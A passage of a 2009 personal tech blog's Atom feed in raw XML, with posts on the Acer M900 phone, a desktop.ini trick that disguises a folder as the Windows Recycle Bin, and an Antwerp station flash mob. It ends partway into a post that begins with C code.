xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_17JNeVdiZ7k/SlMXAktjcLI/AAAAAAAAAJo/U-6QOALAQjc/s72-c/1.JPG' height='72' width='72'/><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-7532831761159249285</id><published>2009-06-26T04:14:00.000-07:00</published><updated>2009-07-09T13:35:00.689-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Dream Phone'/><category scheme='http://www.blogger.com/atom/ns#' term='Acer M900'/><category 
scheme='http://www.blogger.com/atom/ns#' term='SmartPhone'/><category scheme='http://www.blogger.com/atom/ns#' term='Awesome'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows Mobile'/><category scheme='http://www.blogger.com/atom/ns#' term='Cool'/><title type='text'>My Dream Phone</title><content type='html'>&lt;span style="font-family: trebuchet ms;font-family:trebuchet ms;font-size:100%;"  &gt;&lt;br /&gt;&lt;/span&gt;&lt;div style="text-align: justify; font-family: trebuchet ms;"&gt;&lt;span class="Apple-style-span" style=";font-size:100%;" &gt;It appears that the time to switch my phone has finally come. I use a Sony Ericsson Z555i with Gesture Control for my daily communication with the outside world. I also use an LG RD3500 Reliance Handset to speak to my girlfriend. As every phone enthusiast and feature loving geek would do, I set about to do some research to get my Sony Ericsson Z555i with Gesture Control replaced.&lt;/span&gt;&lt;/div&gt;  &lt;p class="MsoNormal"  style="text-align: justify; font-family: trebuchet ms;font-family:trebuchet ms;"&gt;&lt;span style="font-size:100%;"&gt;&lt;o:p&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"  style="text-align: justify; font-family: trebuchet ms;font-family:trebuchet ms;"&gt;&lt;span class="Apple-style-span"  style="font-size:100%;"&gt;&lt;span class="Apple-style-span"&gt;Finding a new phone is never hard if you know what you want in it. I have switched 3 phones over the past 2 years. The best being my current phone. But I recently noticed that it does not suit my persona. It does not have loads of features that would improve my life. Hell, I can’t even check my email on it. I have a list of things my phone should be able to do. Being a Windows fanatic, a Windows Mobile device would be ideal where I could write and test .NET applications. 
Internet and wifi connectivity with push email functionality would be mandatory and throw in some looks, sleek interface and respectable battery life. Not much, one would agree, in terms of features but hey I never said I wanted an IPhone.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"  style="text-align: justify; font-family: trebuchet ms;font-family:trebuchet ms;"&gt;&lt;span style="font-size:100%;"&gt;&lt;o:p&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"  style="text-align: justify; font-family: trebuchet ms;font-family:trebuchet ms;"&gt;&lt;span class="Apple-style-span"  style="font-size:100%;"&gt;&lt;span class="Apple-style-span"&gt;I googled for smartphones and scrolled down the result page to see if anything was worth pursuing. It was then that I saw a news result that said Acer had launched three new phones. Acer? I thought Acer was into laptops. I know because I own a sleek Aspire 5920G [&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;a href="http://www.notebookreview.com/default.asp?newsID=3897"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span"&gt;http://www.notebookreview.com/default.asp?newsID=3897&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:100%;"&gt;&lt;span class="Apple-style-span"&gt;] with 2.2 Ghz of Intel T7300, 4 GB RAM and a 360 GB hard drive. Apart from the curiosity, I happen to be pro Acer (now where have I heard that before, pro Google, pro Microsoft and now pro Acer? I need to delineate my loyalties.) 
and hence thought taking a look at the phone would not budge my intentions.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal"  style="text-align: justify; font-family: trebuchet ms;font-family:trebuchet ms;"&gt;&lt;span class="Apple-style-span"  style="font-size:100%;"&gt;&lt;span class="Apple-style-span"&gt;The minute I checked the Acer website for the smartphone, I fell in love with the m900. It’s a sleek and stylish Windows Mobile device with several other features that I had always dreamt of having. I promised the deepest desires within me that I would someday proudly own this phone and flaunt it across the company where I work. I know that could be disadvantageous since doing that would brand me as a satisfied and well earning employee which would cause a sharp decline in my appraisals which obviously I would not want.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal"  style="text-align: justify; font-family: trebuchet ms;font-family:trebuchet ms;"&gt;&lt;span style="font-size:100%;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_17JNeVdiZ7k/SksXCgDA3xI/AAAAAAAAAHw/UWkB37Mf3f4/s1600-h/acer-m900.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 284px;" src="http://4.bp.blogspot.com/_17JNeVdiZ7k/SksXCgDA3xI/AAAAAAAAAHw/UWkB37Mf3f4/s320/acer-m900.jpg" alt="" id="BLOGGER_PHOTO_ID_5353397913789718290" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal"  style="text-align: justify; font-family: trebuchet ms;font-family:trebuchet ms;"&gt;&lt;span style="font-size:100%;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_17JNeVdiZ7k/SksXCNln96I/AAAAAAAAAHo/7yO2QbE5N00/s1600-h/Acer-M900-1.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 318px; height: 320px;" 
src="http://1.bp.blogspot.com/_17JNeVdiZ7k/SksXCNln96I/AAAAAAAAAHo/7yO2QbE5N00/s320/Acer-M900-1.jpg" alt="" id="BLOGGER_PHOTO_ID_5353397908834613154" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"  style="text-align: justify; font-family: trebuchet ms;font-family:trebuchet ms;"&gt;&lt;span style="font-size:100%;"&gt;&lt;o:p&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"  style="text-align: justify; font-family: trebuchet ms;font-family:trebuchet ms;"&gt;&lt;span class="Apple-style-span"  style="font-size:100%;"&gt;&lt;span class="Apple-style-span"&gt;I have yet to find out the prices which im sure will hinder the progress of my quest to own this baby. I can wait another month, and the month after that, and the month after that and the month after…&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-7532831761159249285?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/7532831761159249285/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2009/06/my-dream-phone.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/7532831761159249285'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/7532831761159249285'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2009/06/my-dream-phone.html' title='My Dream Phone'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image 
rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_17JNeVdiZ7k/SksXCgDA3xI/AAAAAAAAAHw/UWkB37Mf3f4/s72-c/acer-m900.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-3495305997197829779</id><published>2009-06-18T12:28:00.000-07:00</published><updated>2009-07-09T13:45:40.538-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Secret'/><category scheme='http://www.blogger.com/atom/ns#' term='FolderCloak'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='Recycle Bin'/><category scheme='http://www.blogger.com/atom/ns#' term='System Folders'/><title type='text'>Convert normal folders to Windows Shell Folders</title><content type='html'>&lt;div style="font-family: trebuchet ms;font-family:trebuchet ms;" &gt;&lt;span class="Apple-style-span" style="font-weight: bold;font-size:100%;" &gt;&lt;p class="MsoNoSpacing"&gt;&lt;span class="Apple-style-span" style="font-weight: normal;"&gt;I normally store all data in separate logical drives on my computer. My movie collection goes to a drive called Multimedia, so does the music. My code and office work goes to another drive called Office and my OS silently resides in my C drive. I have seen many people, and not just the technology illiterates, but even the tech savvy, store sensitive data right on their desktop and in My Documents.&lt;br /&gt;&lt;br /&gt;Nothing wrong with it, but if your system is used by multiple people, nosy in essence, you wouldn’t want your privacy to be breached.&lt;br /&gt;&lt;br /&gt;The NTFS filesystem provides adequate protection to data via Access Control Lists, but that is another topic altogether. 
Playing around with System folders in Windows, I found that you could convert any folder to a system folder with the right desktop.ini file. Although later research showed me that this is an old trick, I was still fascinated by the sheer simplicity of it.&lt;br /&gt;&lt;br /&gt;Shell folders are special Windows folders like My Computer, Recycle Bin and My Network Places. I wouldn’t go into the math of why it works the way it works, but rather just show you how you could keep all your data inside a folder, convert it to the Recycle Bin and keep it on your Desktop and nobody would suspect there was data in it.&lt;br /&gt;&lt;br /&gt;Here's how:&lt;br /&gt;1. Create a folder called "Secret" on your desktop and copy some files to it.&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: left;"&gt;&lt;span class="Apple-style-span" style="font-weight: normal;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_17JNeVdiZ7k/SjqW1kkncyI/AAAAAAAAAGo/NljzoaObpTM/s1600-h/image0.PNG"&gt;&lt;img src="http://2.bp.blogspot.com/_17JNeVdiZ7k/SjqW1kkncyI/AAAAAAAAAGo/NljzoaObpTM/s320/image0.PNG" alt="" id="BLOGGER_PHOTO_ID_5348753354550375202" style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 154px;" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;/span&gt;&lt;span style=";font-size:100%;" class="Apple-style-span" &gt;2. 
Open notepad [Start &gt; Run &gt; notepad] and type the following exactly as shown:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: courier new;font-size:85%;" &gt;[.ShellClassInfo]&lt;br /&gt;CLSID={645FF040-5081-101B-9F08-00AA002F954E}&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-weight: bold;font-size:100%;" &gt;&lt;br /&gt;&lt;/span&gt;&lt;p class="MsoNoSpacing" style="text-align: center;"&gt;&lt;span class="Apple-style-span" style="font-weight: normal;font-size:100%;" &gt;&lt;span class="Apple-style-span"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_17JNeVdiZ7k/SjqXhhrgdlI/AAAAAAAAAGw/P-IqZ16vq90/s1600-h/Image1.PNG"&gt;&lt;img src="http://3.bp.blogspot.com/_17JNeVdiZ7k/SjqXhhrgdlI/AAAAAAAAAGw/P-IqZ16vq90/s320/Image1.PNG" alt="" id="BLOGGER_PHOTO_ID_5348754109688215122" style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 82px;" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNoSpacing"&gt;&lt;span class="Apple-style-span" style="font-weight: normal;font-size:100%;" &gt;3. Save the file as desktop.ini in the Secret folder on the desktop. 
Select "All Files" under "Save as type" in the Save As dialog of notepad and type the name of the file as desktop.ini&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNoSpacing" style="text-align: center;"&gt;&lt;span class="Apple-style-span" style="font-weight: normal;font-size:100%;" &gt;&lt;span class="Apple-style-span"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_17JNeVdiZ7k/SjqXhpCskUI/AAAAAAAAAG4/9S9gorn3m74/s1600-h/image2.PNG"&gt;&lt;img src="http://3.bp.blogspot.com/_17JNeVdiZ7k/SjqXhpCskUI/AAAAAAAAAG4/9S9gorn3m74/s320/image2.PNG" alt="" id="BLOGGER_PHOTO_ID_5348754111664525634" style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 254px;" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;span style="font-size:100%;"&gt;4. Open command prompt by going to Start &gt; Run &gt; cmd&lt;br /&gt;&lt;br /&gt;5. Navigate to the directory containing your "Secret" folder, this would be the desktop in this example, using the cd command.&lt;br /&gt;&lt;/span&gt;&lt;p class="MsoNoSpacing"&gt;&lt;span class="Apple-style-span" style="font-weight: normal;font-size:100%;" &gt;&lt;span class="Apple-style-span"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_17JNeVdiZ7k/SjqXhxJy33I/AAAAAAAAAHA/ynAf1KK0ft4/s1600-h/image3.PNG"&gt;&lt;img src="http://2.bp.blogspot.com/_17JNeVdiZ7k/SjqXhxJy33I/AAAAAAAAAHA/ynAf1KK0ft4/s320/image3.PNG" alt="" id="BLOGGER_PHOTO_ID_5348754113841782642" style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 97px;" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p  class="MsoNoSpacing" style="font-family:trebuchet ms;"&gt;&lt;span class="Apple-style-span" style="font-weight: normal;font-size:100%;" &gt;6. 
Type "&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_2"&gt;attrib&lt;/span&gt; +S Secret" at the prompt and press Enter.&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNoSpacing"&gt;&lt;span class="Apple-style-span" style="font-weight: normal;font-size:100%;" &gt;&lt;span class="Apple-style-span"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_17JNeVdiZ7k/SjqXiLdiYUI/AAAAAAAAAHI/2Fmn5T07hrU/s1600-h/Image4.PNG"&gt;&lt;img src="http://3.bp.blogspot.com/_17JNeVdiZ7k/SjqXiLdiYUI/AAAAAAAAAHI/2Fmn5T07hrU/s320/Image4.PNG" alt="" id="BLOGGER_PHOTO_ID_5348754120903909698" style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 76px;" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNoSpacing"&gt;&lt;span class="Apple-style-span" style="font-weight: normal;font-size:100%;" &gt;7. Navigate to your desktop and find your folder containing your precious cargo converted to the Recycle Bin. View the properties of the folder to find the Recycle Bin properties pop up.&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNoSpacing"&gt;&lt;span class="Apple-style-span" style="font-weight: normal;font-size:100%;" &gt;&lt;span class="Apple-style-span"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_17JNeVdiZ7k/SjqZRdx2tlI/AAAAAAAAAHY/qNvG9q1pEkA/s1600-h/Image5.PNG"&gt;&lt;img src="http://4.bp.blogspot.com/_17JNeVdiZ7k/SjqZRdx2tlI/AAAAAAAAAHY/qNvG9q1pEkA/s320/Image5.PNG" alt="" id="BLOGGER_PHOTO_ID_5348756032786445906" style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 298px;" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNoSpacing"&gt;&lt;span class="Apple-style-span" style="font-weight: normal;font-size:100%;" &gt;8. 
Open it to find the contents of the Recycle Bin instead of your data.&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNoSpacing"&gt;&lt;span class="Apple-style-span" style="font-weight: normal;font-size:100%;" &gt;&lt;span class="Apple-style-span"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_17JNeVdiZ7k/SjqZRtLDXQI/AAAAAAAAAHg/FVEOLtyVFLA/s1600-h/Image6.png"&gt;&lt;img src="http://2.bp.blogspot.com/_17JNeVdiZ7k/SjqZRtLDXQI/AAAAAAAAAHg/FVEOLtyVFLA/s320/Image6.png" alt="" id="BLOGGER_PHOTO_ID_5348756036918664450" style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 143px;" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNoSpacing"&gt;&lt;span class="Apple-style-span" style="font-weight: normal;font-size:100%;" &gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;span style="font-size:100%;"&gt;This happens because Windows finds the desktop.ini file in the folder and the System attribute on the folder. Windows then reads the desktop.ini file to find the Class Identifier [CLSID] for Recycle Bin, which is {645FF040-5081-101B-9F08-00AA002F954E}. 
Your data is still present in the folder but is no longer shown by Windows Explorer, because the shell detects the folder as the Recycle Bin and not a file folder. This hides the data rather than protecting it: the command prompt used in steps 4 to 6 still lists and reads the folder's contents, and anyone who knows the trick can remove the attribute.&lt;br /&gt;&lt;br /&gt;To get your data back, just open command prompt, navigate to the Desktop and enter attrib -S Secret to remove the System attribute on the folder.&lt;br /&gt;&lt;br /&gt;There are plenty of shell folders around Windows, but the ones I use most often are listed below with their CLSID values; just replace the CLSID value in the desktop.ini file:&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-family: courier new;"&gt;My Computer: {20D04FE0-3AEA-1069-A2D8-08002B30309D}&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;Recycle Bin: {645FF040-5081-101B-9F08-00AA002F954E}&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;My Network Places: {208D2C60-3AEA-1069-A2D7-08002B30309D}&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;To automate the entire process, I wrote a simple tool called FolderCloak that just allows you to do the above with a nice GUI. 
You can download FolderCloak [and my other tools] at &lt;a href="http://riyazahemed.webng.com/"&gt;http://riyazahemed.webng.com&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-3495305997197829779?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/3495305997197829779/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2009/06/converting-normal-folders-to-windows.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/3495305997197829779'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/3495305997197829779'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2009/06/converting-normal-folders-to-windows.html' title='Convert normal folders to Windows Shell Folders'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_17JNeVdiZ7k/SjqW1kkncyI/AAAAAAAAAGo/NljzoaObpTM/s72-c/image0.PNG' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-2410183267858551631</id><published>2009-06-17T13:26:00.000-07:00</published><updated>2009-06-18T02:27:11.224-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Belgium'/><category 
scheme='http://www.blogger.com/atom/ns#' term='Station'/><category scheme='http://www.blogger.com/atom/ns#' term='Maria'/><category scheme='http://www.blogger.com/atom/ns#' term='Antwerp'/><category scheme='http://www.blogger.com/atom/ns#' term='Do Re Mi'/><category scheme='http://www.blogger.com/atom/ns#' term='Happy'/><title type='text'>The Sound of Music at Central Station Antwerp (Belgium)</title><content type='html'>&lt;p class="MsoNormal"&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Picture this: Around 200 people on a railway station, seemingly in their own worlds, laughing, walking, squatting, talking and all the other things that being humans we do. And then the “Do Re Mi song” (Maria’s Song from the Sound of Music) starts playing on the station’s speakers which causes these seemingly common people, utterly unbeknownst to each other, completely oblivious to their thoughts come together and perform a four minute dance completely synchronized to the last step.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;I don’t care if it was shot as a publicity stunt for a reality show in Belgium, I don’t care if the people on the Antwerp Station were all paid to dance nor do I care if they had just 2 well choreographed rehearsals. 
Hell Its awesome!!&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;What I care about is how I managed to smile after having a tough day at office, about how I connected with the people, with the glow on their faces, with the sheer elation that the twinkling eyes expressed (although I couldn’t see them, I felt them) and the child in every single soul in that building..&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;I was amazed that there are things like swine flu, nuclear weapons, global warming, spontaneous human combustion, the lochness monster, cancers, my shady neighbors and drugs on this planet. Well these things can wait for 4 minutes.. I say go ahead and watch the video.. I’ll just hum along.. 
&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Doe, a deer, a female deer&lt;br /&gt;Ray, a drop of golden sun&lt;br /&gt;Me, a name I call myself&lt;br /&gt;Far, a long, long way to run&lt;br /&gt;Sew, a needle pulling thread&lt;br /&gt;La, a note to follow Sew&lt;br /&gt;Tea, a drink with jam and bread&lt;br /&gt;That will bring us back to Do (oh-oh-oh)&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;object width="410" height="320"&gt;&lt;param name="movie" value="http://www.youtube.com/v/7EYAUazLI9k&amp;amp;hl=en&amp;amp;fs=1&amp;amp;"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/7EYAUazLI9k&amp;amp;hl=en&amp;amp;fs=1&amp;amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="410" height="320"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-2410183267858551631?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/2410183267858551631/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2009/06/sound-of-music-in-central-station.html#comment-form' title='0 Comments'/><link rel='edit' 
type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/2410183267858551631'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/2410183267858551631'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2009/06/sound-of-music-in-central-station.html' title='The Sound of Music at Central Station Antwerp (Belgium)'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-5252525602460981822</id><published>2009-06-16T14:08:00.001-07:00</published><updated>2009-06-18T02:26:46.768-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='kids'/><category scheme='http://www.blogger.com/atom/ns#' term='irony'/><category scheme='http://www.blogger.com/atom/ns#' term='First post'/><category scheme='http://www.blogger.com/atom/ns#' term='life'/><title type='text'>My first post!!</title><content type='html'>&lt;span class="Apple-style-span"  style=" ;font-family:'Times New Roman';"&gt;&lt;div style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; width: auto; font: normal normal normal 100%/normal Georgia, serif; text-align: left; "&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;#include &amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="border-top-width: 0px; border-right-width: 0px; 
border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; width: auto; font: normal normal normal 100%/normal Georgia, serif; text-align: left; "&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;#include &amp;lt;conio.h&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; width: auto; font: normal normal normal 100%/normal Georgia, serif; text-align: left; "&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; width: auto; font: normal normal normal 100%/normal Georgia, serif; text-align: left; "&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;int main()&lt;/span&gt;&lt;/div&gt;&lt;div style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; width: auto; font: normal normal normal 100%/normal Georgia, serif; text-align: left; "&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet 
